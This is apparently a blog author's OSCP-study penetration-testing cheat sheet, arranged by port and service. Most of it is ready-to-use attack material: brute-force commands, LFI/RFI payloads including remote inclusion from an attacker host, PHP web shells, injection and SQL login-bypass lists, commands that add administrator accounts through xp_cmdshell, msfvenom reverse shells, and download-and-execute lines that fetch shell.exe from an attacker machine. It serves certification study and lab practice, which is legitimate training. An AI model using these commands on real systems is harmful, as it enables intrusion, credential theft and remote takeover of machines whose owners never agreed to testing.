Skip to content

Penetration Testing CheatSheet

While i was Studying for OSCP from various sources. I took note, made a quick cheat sheet, so that i don’t need to search same thing again and again. I am sharing this cheat sheet as i think it might be useful for someone.

Enumeration

Enumeration is most important part. All finding should be noted for future reference. Without enumeration, we will have hard time to exploit the target.

Basic Enumeration

Whenever I start pentesting an IP address, My First starting favorite tool is nmap. While nmap keep scanning, in other side using browser I try connecting to some common port like firefox 10.10.1.10:8080.

Port Scanning & Service identifying

#Scan for all ports
$ nmap -vvv -Pn -p- -oN allports $target
#Scan for quick UDP ports
$ nmap -sU -v -oN udpPorts $targets

Filter all open ports for nmap script scanning:

$ grep '/tcp' allports | awk -F "/" '{print $1}'| tr '\n' ',';echo
#copy and paste the ports list to nmap '-p' and scan
$ nmap -sC -sV -p 1,2,3,4 -oN scriptscan $target

Automated Enumeration Script

Download: https://github.com/21y4d/nmapAutomator

./nmapAutomator.sh $target_ip All

Other Interesting tools

binwalk <image>
strings -n 8 <image/file>
steghide info <image>
strace <file>
ltrace <file>
file <file>
ls -la <file>

Pentesting Specific Service

If we have found some ports open, we can use below methods to enumerate them!

Port 21(FTP)

Scan FTP with Nmap

nmap -vvv -sC -p21 $target<

Login and Upload backdoor

ftp $target
ftp> USER anonymous
ftp> PASS anon@bytefellow.com
ftp> binary
ftp> upload path/file_name.ext

Port 22(SSH)

Banner Grab

ssh root@target

Quick Brute Forces

hydra -l root -P wordlist ssh://target_ip

Port 25(SMTP)

Username Enumeration. Useful for brute forcing

$ nc $target 25
VRFY username

Port 53(DNS)

Forward Lookup:

for dns in $(cat namelist.txt);do host $dns.google.com;done|grep "has address"

Reverse Lookup:

for adr in $(seq 164 167); do host $ip.$adr;done|grep "pointer"

Test for Zone transfer from your kali machine

$ host -t ns google.com
google.com name server ns3.google.com.
google.com name server ns2.google.com.
google.com name server ns4.google.com.
google.com name server ns1.google.com.

#Zone Transfer. If enabled, should list address!
$ host -l google.com ns4.google.com 
Using domain server: 
Name: ns4.google.com
Address: 216.239.38.10#53
Aliases: 

; Transfer failed.

$ dnsrecon -d bytefellow.com -t axfr #Zone Transfer
dnsenum -f namelist.txt bytefellow.com #brute force domain name

#

Enumerate using nslookup,dig and gobuster:

$ nslookup
>server $target_ip
.
.
>$target_ip
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

$ dig axfr cronos.htb @10.10.10.13
$ gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 

Other tools to try:

host -l target name_server #Zone Transfer
dnsrecon -d target.com -t axfr #Zone Transfer
dnsrecon -d target.com -D ~/words.txt -t brt #brute force domain.
dnsenum target #Zone transfer

Port 79(Finger)

If finger service is running, it is possible to enumerate username.

nmap -vvv -Pn -sC -sV -p79 $target

Port 80/443(HTTP/HTTPS)

What to check?

Manually Browse the links. Identify used Technology. Search for Vulnerability with identified info. Gather information from SSL. Check if it has any proxy related vulnerability. Brute force for Directory, Sensitive files. Check for hidden params. Find all inputs point. Find subdomains. View html sources, and also Browse Manually

http://ip/robots.txt http://ip/sitemap.xml http://ip/not_exist Identify Technology using whatWeb

whatweb -a 3 $target

Scan using Nikto

nikto -h $target

If any CMS identified

wpscan --url http://$target -e p,t,u --detection-mode aggressive &gt; wpscan.log #For wordpress scanning
wpscan -e vp --plugins-detection aggressive --api-token API_KEY --url http://172.31.1.8 #Scan for vulnerable plugins with API
droopescan scan drupal http://$target -t 32 # if drupal found
joomscan --ec -u $target #if joomla found

Brute Force Directory and Files

First use small common wordlist Then Big Word list Try with CMS related wordlist Word list File in Kali Linux:

/usr/share/dirbuster/wordlists/directory-list-1.0.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 
/usr/share/dirb/wordlists/big.txt
/usr/share/dirb/wordlists/catala.txt
/usr/share/dirb/wordlists/common.txt
/usr/share/dirb/wordlists/small.txt

Brute force directory and files using Gobuster:

#scan only for directory
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt 

#Scan for directory, and files extension of php,txt or conf
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf

#ignore Certificate check  
gobuster dir -u https://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf -k 

Password brute Forcing(wordpress example) using hydra:

hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

LFI and RFI

If the URL parameter has file name, we can try to vulnerability for LFI/RFI. We should request invalid file and see if any error is displayed!

#target url
http://site/index.php?file=mail.php
# Display any Error? We may get error by requesting invalid file, like: Warning: include(files/ninevehNotes): 
failed to open stream: No such file or directory in /var/www/html/direcotry/note.php on line 21

http://site/index.php?file=invalid.php

#Exploit
file=/etc/passwd
file=../../../../etc/passwd
file=/etc/passwd%00
file=/var/log/httpd-access.log
file=php://filter/read=convert.base64-encode/resource=/etc/passwd
file=php://filter/read=convert.base64-encode/resource=index

#May need to try different way to find the exploit:
file=thefile/note/../../../../../../../../../etc/passwd

#Remote file Inclusion!
file=http://attacker_ip/shell.txt

LFI Can execute code!

#Find or guess where the logs files are exist, such as:
file=/usr/local/etc/apache24/httpd.conf 

Modify the User agent of header and send using CURL or Burpsuite or even netcat:

User-Agent: bytefellow: <?php system($_GET['cmd']); ?>

Now execute command:

http://target/file.php?file=/var/log/access.log&cmd=id

Command Execution

If found any parameters or input fields, we can try for command execution. Test Every parameters and input fields with these payload(Better to use burp suite intruder):

#For Linux
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
#For Windows
| dir
; dir
$(dir)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings*
; dir C:\Documents and Settings*
& dir C:\Documents and Settings*
&& dir C:\Documents and Settings*
dir C:\Documents and Settings*
| dir C:\Users
; dir C:\Users

SQLi for Login Bypass

If any login page found, should be tried to bypass password check. These payload copied from: https://github.com/payloadbox/sql-injection-payload-list

'-'
' '
'&'
'^'
'' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or '''
"-"
" "
"&"
"^"
"" " or ""-" " or "" " " or ""&" " or ""^" " or """
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#

Exploiting WebDav

If one method fail, another should be tested. If nothing work, Find different exploit!

Method 1:

davtest -url http://$target/webdav
cadaver http://$target/webdav
> put test.php

Method 2:

cp /usr/share/webshells/php/simple-backdoor.php bytef.php
curl -T 'bytef.php' 'http://ip/webdav/'

Method 3:

nmap -p 80 $ip_address –script http-put –script-args http-put.url=’/webdav/bytef.php’,http-put.file=’backdoor/bytef.php’

Port 110(POP3)

Found an user login information?

$ nc -vvv $target 110
USER test
PASS test

#list all mails
LIST 

#Retrive the mail
retr mail_number

Port 111 (RPCINFO)

Connect with Null session.

nmap -v -p 111 --script=nfs* $ip
rpcclient -U "" $target
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID

Port 137,138,139

nmblookup -A <IP>
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137,138,139 -Pn -n <IP>

Port 445(SMB)

There is a big chance getting sensitive information with SMB!

Enumerating SMB

#Enumerate
nmap -v -p 139,445 --script=smb-os-discovery smb-ls smb-enum-users smbenum-shares smb-enum-sessions smb-system-info $ip

#Scan for Vulnerability
nmap -v -p 139,445 --script=smb-vuln-* --script-args=unsafe= $ip

#Other tools
enum4linux -a $target
smbmap -h $target
smbclient -L -N //$target 
smbclient -L -U username //$ip

Connecting to share without password(Anonymous login)

smbclient -N //$ip/share
&gt;recurse on
&gt;prompt off
&gt;cd directory
&gt;mget directory

Login with Password

smbclient -U username //$ip/share

Port 389(LDAP)

ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=cascade,DC=local" '(objectClass=person)' > persons

Port 1433(MSSQL)

Reference: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

brute force for “SA” password

hydra -l sa -P password.txt -V $ip mssql

Connect to MSSQL Server:

sqsh -S server_address -U sa -P password

Enable xp_cmdshell:

exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go

Execute System Command:

xp_cmdshell 'net user byte bytepass /add'
go
xp_cmdshell 'net localgroup Administrators byte /add'
go
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go

Port 2049(NFS)

Enumerate shares

nmap -v -p 2049 --script=nfs* $ip
showmount -e $ip
showmount -a $ip

Mount shares in Kali Machine

mount -t nfs -o vers=2 target_ip:/home local_folder/ -o nolock

After mounting the filesystem if we don’t have read/write permission, we need to edit /etc/passwd and change UUID:

root@kali:/home/bytef//nfs# adduser pwn
Adding user `pwn' ...
Adding new group `marcus' (1001) ...
Adding new user `marcus' (1001) with group `marcus' ...
Creating home directory `/home/pwn' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for pwn
Enter the new value, or press ENTER for the default 
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] y
root@kali:/home/bytef/nfs# nano /etc/passwd
marcus@1016:1016:,,,:/home/pwn:/bin/bash
root@kali:/home/bytef/nfs# su pwn

Now we can write files to the target folder of the network filesystem. For example:

pwn@kali:/home/bytef/nfs/pwn$ ssh-keygen                                                                                                                                                
Generating public/private rsa key pair.                                                                                                                                                                      
Enter file in which to save the key (/home/pwn/.ssh/id_rsa): /home/bytef/pwn/.ssh                                                                                                   
Enter passphrase (empty for no passphrase):                                                                                                                                                                  
Enter same passphrase again:                                                                                                                                                                                 
Your identification has been saved in /home/bytef/nfs/pwn/.ssh                                                                                                                             
Your public key has been saved in /home/bytef/nfs/pwn/.ssh.pub                                                                                                                             
The key fingerprint is:                                                                                                                                                                                      
SHA256:/PH2zrnWxuuT18DFMZvN7WGS7ltUKdz4N+iYjTEZYiQ4 pwn@kali                                                                                                                                               
The key's randomart image is:                                                                                                                                                                                
+---[RSA 3072]----+                                                                                                                                                                                          
|         . .     |                                                                                                                                                                                          
|      E . o      |                                                                                                                                                                                          
|       o o       |                                                                                                                                                                                          
|       .o .     o|                                                                                                                                                                                          
|        S..    *o|                                                                                                                                                                                          
|         .oo. oo%|
|         +. o+ &X|
|          o.+o=O@|
|           . BX*B|
+----[SHA256]-----+

Port 3306(MYSQL)

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,
mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,
mysql-variables,mysql-vuln-cve2012-2122 <IP>

Port 3389(RDP)

Connect to RDP

xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP

Quick Brute force if a valid username found:

hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp

Add user to RDP Group

net localgroup "Remote Desktop Users" username /add

Port 5900/5800(VNC)

Scan with nmap

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 $ip

Connect using vncviewer from Kali

vncviewer [-passwd passwd.txt] <IP>::5901

Password Attack

Sometime we need to do password guessing(We should!). For better success rate we need a good password dictionary. Also we should search for default credential online!

I have collected some Username and password for quick brute force, usually used for CTF. These list could be used to exploit weak password. Uploaded in GitHub:

Common Username Common Password

Common password

/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt

Generate Password using cewl

cewl -m 2 -d 5 -a -w pass1.txt http://$ip_address/dir/index.php

Brute Force using Burp

If it is an web form we can brute force in intruder and match grep. Some screenshot from burp suit:

To brute force web form with the hydra, we need to grab the post data from the burp suite carefully. Otherwise, we will get false positive and waste lots of time! I tried to brute force otrs and it worked.

Brute Force using Hydra

hydra -l root@localhost -V -P pass1.txt $target_address.com http-form-post "/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly.:H=Cookie: OTRSBrowserHasCookie=1"
hydra -l root@localhost -V -P pass1.txt $target_address.com http-form-post "/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed!"

Vulnerability and Exploitation

We have enumerated our target. Now Find vulnerabilities!

Find Vulnerability using Nmap

nmap -Pn -p 80,139,445,21 --script vuln $target

Using Searchsploit

#update database
searchsploit -u
#Searching variation
searchsploit afd windows local
searchsploit kernel 2.6
searchsploit oracle windows

#this will copy the exploit to current directory
searchsploit -m exploit_id 

Find Exploits using Google

Three kind of search should be enough to find an working exploit

service_version Exploit
site: github.com service_version exploit
site: exploit-db.com service_version exploit

Working with Public Exploits

A public exploit might be coded in python, ruby, c/c++ or any other language. Before executing the exploit:

Read the instruction Carefully. Edit Target address, Reverse connection ip and Ports.

Working with Shell

We have exploited vulnerability and got shell. Now what? Upgrade shell? Privilege escaltion? Fix shell issue?

Backdoor Files in Kali

Kali already has some web shells.

/usr/share/webshells

Quick Shell in Different language

Here it is: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

<?php system("whoami"); ?>
<?php system($_GET['cmd']); ?>
<?php echo exec("whoami");?>

Generate using msfvenom

#Staged windows Payload
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exe

#Stageless Windows payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe

#Linux Stageless Payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Linux Staged Payload
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Other Platform
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > reverse.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > reverse.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > reverse.jsp
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp

#Generate powershell payload
msfvenom -p windows/x64/powershell_reverse_tcp -o psh.ps1 -a x64 --platform windows LHOST=192.168.88.251 LPORT=8080

#Generate Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f

Upgrading Shell

Listening for Connection

nc -lvp 1337

Upgrade your unstable shell!

python -c 'import pty;pty.spawn("/bin/bash")'
^Z
stty raw -echo
fg

Running Python 3 http Server

#Python 3
python3 -m http.server
#python 2
python -m SimpleHTTPServer

Uploading Shell/File

After getting shell, we may need to upload additional files or stable backdoor.

Start HTTP server in Kali:

python3 -m http.server

If target OS is Linux:

wget http://host:8000/file.bin -O /dev/shm/filename.bin
curl http://host:8000/file.bin -o /dev/shm/filename.bin

If target OS is Windows:

#Download and Execute powershell script
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/Invoke-PowerShellTcp.ps1')

(New-Object Net.WebClient).DownloadFile("http://host/shell.exe","C:\Windows\Temp\shell.exe")
Invoke-WebRequest "http://host/shell.exe" -OutFile "shell.exe"
powershell.exe -c Invoke-WebRequest 10.10.0.67:8000/shell.exe -OutFile shell.exe

certutil -urlcache -split -f http://10.10.0.67:8000/shell.exe c:\windows\Temp\shell.exe && c:\windows\Temp\shell.exe

#Transfer with SMB Share. Attacker machine SMB server should be running
copy //host/shell.exe /path/shell.exe

Transfer file using impacket samba script:

#In kali start SMB Server
python3 smbserver.py byte /home/bytef/files


#on the victim machine view the share name
net view \\kali_ip
net use \\10.10.14.6\byte

#copy the file from shared folder
copy \\kali_ip\byte\file.ext file.ext

Piviot/Tunnel/Port Forwarding

Port forward is required when we can’t access an specific service or other internal machine from our kali machine!

Local Port Forwarding

Have SSH access with low privileges? and There are some ports open internally? Try Local Port Forwarding.

-L = Kali’s Port -R = Kali Port $ip:3306 is the port from target

ssh –L 3306:$ip:3306 user@$target_ip

Remote Port Forwarding

No SSH Access but limited shell? Also some weird port is open? Upload plink and Try Remote port forward with plink

ssh –R 3306:localhost:3306 root@kali_ip
ssh –R 3306:localhost:3306 -o "UserKnownHostFile=/dev/null" -o "UserHostKeyChecking=no" root@kali_ip

Connect to the tunneled port:

#Verify with nc
nc -vvv localhost 3306

#If mysql
mysql -u username -p -h 127.0.0.1 -P 3306

Dynamic Port Forwarding(Socks4)

Dynamic Port Forwarding from victim machine(Socks Proxy):

ssh -D 8080 -f -N user@$target_ip

With Dynamic Port Forwarding We can access/browse any ip range of the victim machine. We just need to configure proxychains.conf as follows:

nano /etc/proxychains.conf
...
.
.
....
socks4  127.0.0.1 8080

Now we can use any application through proxychains… such as:

proxychains firefox
proxychains nmap -sT -Pn -p139,445 $ip

Port Forwarding using Plink.exe

Remote Port Forwarding using Plink. Needed When we don’t have access to specific port on target box!

plink.exe -ssh -l kali_user -pw kali_password -R $kali_ip:445:127.0.0.1:445 $kali_ip